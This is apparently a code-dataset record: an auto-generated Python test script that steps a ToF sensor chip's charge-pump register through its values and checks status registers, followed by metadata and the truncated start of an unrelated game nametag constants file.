Python
|
examples/tof-viewer/external/newton_host_driver/src/host_api/examples/python/tests/dms_eval_tests/fc_asm_mscm_qpump/fc_asm_mscm_qpump.py
|
rick-yhchen1013/aditof-sdk-rework
|
911465dd1e05dd0b1c5107197b3b4dc3a10f77f9
|
[
"MIT"
] | 5
|
2021-09-22T10:04:47.000Z
|
2022-02-08T17:55:09.000Z
|
examples/tof-viewer/external/newton_host_driver/src/host_api/examples/python/tests/dms_eval_tests/fc_asm_mscm_qpump/fc_asm_mscm_qpump.py
|
rick-yhchen1013/aditof-sdk-rework
|
911465dd1e05dd0b1c5107197b3b4dc3a10f77f9
|
[
"MIT"
] | 99
|
2021-02-01T12:45:09.000Z
|
2022-03-08T09:54:13.000Z
|
examples/tof-viewer/external/newton_host_driver/src/host_api/examples/python/tests/dms_eval_tests/fc_asm_mscm_qpump/fc_asm_mscm_qpump.py
|
rick-yhchen1013/aditof-sdk-rework
|
911465dd1e05dd0b1c5107197b3b4dc3a10f77f9
|
[
"MIT"
] | 4
|
2021-08-09T12:32:55.000Z
|
2021-12-13T05:38:55.000Z
|
#!/usr/bin/env python
""" Script generated from simulation of the fc_asm_mscm_qpump test case.
Usage:
fc_asm_mscm_qpump.py [--no_reset]
Options:
--help Shows this help message.
"""
from __future__ import print_function
from __future__ import absolute_import
from __future__ import unicode_literals
from docopt import docopt
import sys
import io
import os
import time
import struct
import subprocess
import ctypes
from collections import OrderedDict
import threading
from newton_control_main import newton as newton
if __name__ == "__main__":
performReset = True
args = docopt(__doc__, version='0.1')
rc = newton.adi_newton_config( 0 )
if rc != 0:
print( "ERROR: newton.adi_newton_config return an error (" + str( rc ) + ")." )
sys.exit( rc )
if args['--no_reset']:
performReset = False
if performReset == True:
newton.adi_reset_newton( newton.PIN_MODE_HSP_DEBUG )
newton.adi_check_register_py( 0x0142, 0x0500 ) # pll_status
newton.adi_write_register( 0x0028, 0x0000 ) # systemClockControl
newton.adi_write_register( 0x0140, 0x0100 ) # pll_ctrl
newton.adi_write_register( 0x0146, 0x00fb ) # power_down_adc_others
newton.adi_write_register( 0x0144, 0x0006 ) # power_down_0
newton.adi_write_register( 0x0146, 0x007b ) # power_down_adc_others
newton.adi_write_register( 0x0144, 0x0004 ) # power_down_0
newton.adi_write_register( 0x014c, 0x0000 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x0000 ) # pump_s1
newton.adi_write_register( 0x014c, 0x0100 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x0100 ) # pump_s1
newton.adi_write_register( 0x014c, 0x0200 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x0200 ) # pump_s1
newton.adi_write_register( 0x014c, 0x0300 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x0300 ) # pump_s1
newton.adi_write_register( 0x014c, 0x0400 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x0400 ) # pump_s1
newton.adi_write_register( 0x014c, 0x0500 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x0500 ) # pump_s1
newton.adi_write_register( 0x014c, 0x0600 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x0600 ) # pump_s1
newton.adi_write_register( 0x014c, 0x0700 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x0700 ) # pump_s1
newton.adi_write_register( 0x014c, 0x0800 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x0800 ) # pump_s1
newton.adi_write_register( 0x014c, 0x0900 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x0900 ) # pump_s1
newton.adi_write_register( 0x014c, 0x0a00 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x0a00 ) # pump_s1
newton.adi_write_register( 0x014c, 0x0b00 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x0b00 ) # pump_s1
newton.adi_write_register( 0x014c, 0x0c00 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x0c00 ) # pump_s1
newton.adi_write_register( 0x014c, 0x0d00 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x0d00 ) # pump_s1
newton.adi_write_register( 0x014c, 0x0e00 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x0e00 ) # pump_s1
newton.adi_write_register( 0x014c, 0x0f00 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x0f00 ) # pump_s1
newton.adi_write_register( 0x014c, 0x1000 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x1000 ) # pump_s1
newton.adi_write_register( 0x014c, 0x1100 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x1100 ) # pump_s1
newton.adi_write_register( 0x014c, 0x1200 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x1200 ) # pump_s1
newton.adi_write_register( 0x014c, 0x1300 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x1300 ) # pump_s1
newton.adi_write_register( 0x014c, 0x1400 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x1400 ) # pump_s1
newton.adi_write_register( 0x014c, 0x1500 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x1500 ) # pump_s1
newton.adi_write_register( 0x014c, 0x1600 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x1600 ) # pump_s1
newton.adi_write_register( 0x014c, 0x1700 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x1700 ) # pump_s1
newton.adi_write_register( 0x014c, 0x1800 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x1800 ) # pump_s1
newton.adi_write_register( 0x014c, 0x1900 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x1900 ) # pump_s1
newton.adi_write_register( 0x014c, 0x1a00 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x1a00 ) # pump_s1
newton.adi_write_register( 0x014c, 0x1b00 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x1b00 ) # pump_s1
newton.adi_write_register( 0x014c, 0x1c00 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x1c00 ) # pump_s1
newton.adi_write_register( 0x014c, 0x1d00 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x1d00 ) # pump_s1
newton.adi_write_register( 0x014c, 0x1e00 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x1e00 ) # pump_s1
newton.adi_write_register( 0x014c, 0x1f00 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x1f00 ) # pump_s1
newton.adi_write_register( 0x014c, 0x2000 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x2000 ) # pump_s1
newton.adi_write_register( 0x014c, 0x2100 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x2100 ) # pump_s1
newton.adi_write_register( 0x014c, 0x2200 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x2200 ) # pump_s1
newton.adi_write_register( 0x014c, 0x2300 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x2300 ) # pump_s1
newton.adi_write_register( 0x014c, 0x2400 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x2400 ) # pump_s1
newton.adi_write_register( 0x014c, 0x2500 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x2500 ) # pump_s1
newton.adi_write_register( 0x014c, 0x2600 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x2600 ) # pump_s1
newton.adi_write_register( 0x014c, 0x2700 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x2700 ) # pump_s1
newton.adi_write_register( 0x014c, 0x2800 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x2800 ) # pump_s1
newton.adi_write_register( 0x014c, 0x2900 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x2900 ) # pump_s1
newton.adi_write_register( 0x014c, 0x2a00 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x2a00 ) # pump_s1
newton.adi_write_register( 0x014c, 0x2b00 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x2b00 ) # pump_s1
newton.adi_write_register( 0x014c, 0x2c00 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x2c00 ) # pump_s1
newton.adi_write_register( 0x014c, 0x2d00 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x2d00 ) # pump_s1
newton.adi_write_register( 0x014c, 0x2e00 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x2e00 ) # pump_s1
newton.adi_write_register( 0x014c, 0x2f00 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x2f00 ) # pump_s1
newton.adi_write_register( 0x014c, 0x3000 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x3000 ) # pump_s1
newton.adi_write_register( 0x014c, 0x3100 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x3100 ) # pump_s1
newton.adi_write_register( 0x014c, 0x3200 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x3200 ) # pump_s1
newton.adi_write_register( 0x014c, 0x3300 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x3300 ) # pump_s1
newton.adi_write_register( 0x014c, 0x3400 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x3400 ) # pump_s1
newton.adi_write_register( 0x014c, 0x3500 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x3500 ) # pump_s1
newton.adi_write_register( 0x014c, 0x3600 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x3600 ) # pump_s1
newton.adi_write_register( 0x014c, 0x3700 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x3700 ) # pump_s1
newton.adi_write_register( 0x014c, 0x3800 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x3800 ) # pump_s1
newton.adi_write_register( 0x014c, 0x3900 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x3900 ) # pump_s1
newton.adi_write_register( 0x014c, 0x3a00 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x3a00 ) # pump_s1
newton.adi_write_register( 0x014c, 0x3b00 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x3b00 ) # pump_s1
newton.adi_write_register( 0x014c, 0x3c00 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x3c00 ) # pump_s1
newton.adi_write_register( 0x014c, 0x3d00 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x3d00 ) # pump_s1
newton.adi_write_register( 0x014c, 0x3e00 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x3e00 ) # pump_s1
newton.adi_write_register( 0x014c, 0x3f00 ) # pump_s1
newton.adi_write_register( 0x0150, 0x0105 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x0150, 0x0101 ) # regif_ctrl
newton.adi_check_register_py( 0x0032, 0x0000 ) # errorStatus
newton.adi_check_register_py( 0x014c, 0x3f00 ) # pump_s1
| 57.18578
| 85
| 0.770385
| 3,391
| 24,933
| 5.265408
| 0.047774
| 0.1986
| 0.201512
| 0.316662
| 0.956035
| 0.952786
| 0.952786
| 0.948866
| 0.786558
| 0.781406
| 0
| 0.181977
| 0.148157
| 24,933
| 435
| 86
| 57.317241
| 0.658694
| 0.170818
| 0
| 0.615385
| 1
| 0
| 0.003551
| 0.001184
| 0
| 0
| 0.231418
| 0
| 0
| 1
| 0
| false
| 0
| 0.033654
| 0
| 0.033654
| 0.004808
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
383074536cb48704007be50513ddc31988c2b4bc
| 8,025
|
py
|
Python
|
otp/nametag/NametagConstants.py
|
CrankySupertoon01/Toontown-2
|
60893d104528a8e7eb4aced5d0015f22e203466d
|
[
"MIT"
] | 1
|
2021-02-13T22:40:50.000Z
|
2021-02-13T22:40:50.000Z
|
otp/nametag/NametagConstants.py
|
CrankySupertoonArchive/Toontown-2
|
60893d104528a8e7eb4aced5d0015f22e203466d
|
[
"MIT"
] | 1
|
2018-07-28T20:07:04.000Z
|
2018-07-30T18:28:34.000Z
|
otp/nametag/NametagConstants.py
|
CrankySupertoonArchive/Toontown-2
|
60893d104528a8e7eb4aced5d0015f22e203466d
|
[
"MIT"
] | 2
|
2019-12-02T01:39:10.000Z
|
2021-02-13T22:41:00.000Z
|
CFNoQuitButton=256
CFPageButton=16
CFQuicktalker=4
CFQuitButton=32
CFReversed=64
CFSndOpenchat=128
CFSpeech=1
CFThought=2
CFTimeout=8
CCNormal = 0
CCNonPlayer = 1
CCSuit = 2
CCToonBuilding = 3
CCSuitBuilding = 4
CCHouseBuilding = 5
CCSpeedChat = 6
NAMETAG_COLORS = {
CCNormal: (
# Normal FG BG
((0.3, 0.3, 0.7, 1.0), (0.8, 0.8, 0.8, 0.5), # Name
(0.0, 0.0, 0.0, 1.0), (1.0, 1.0, 1.0, 1.0)), # Chat
# Click FG BG
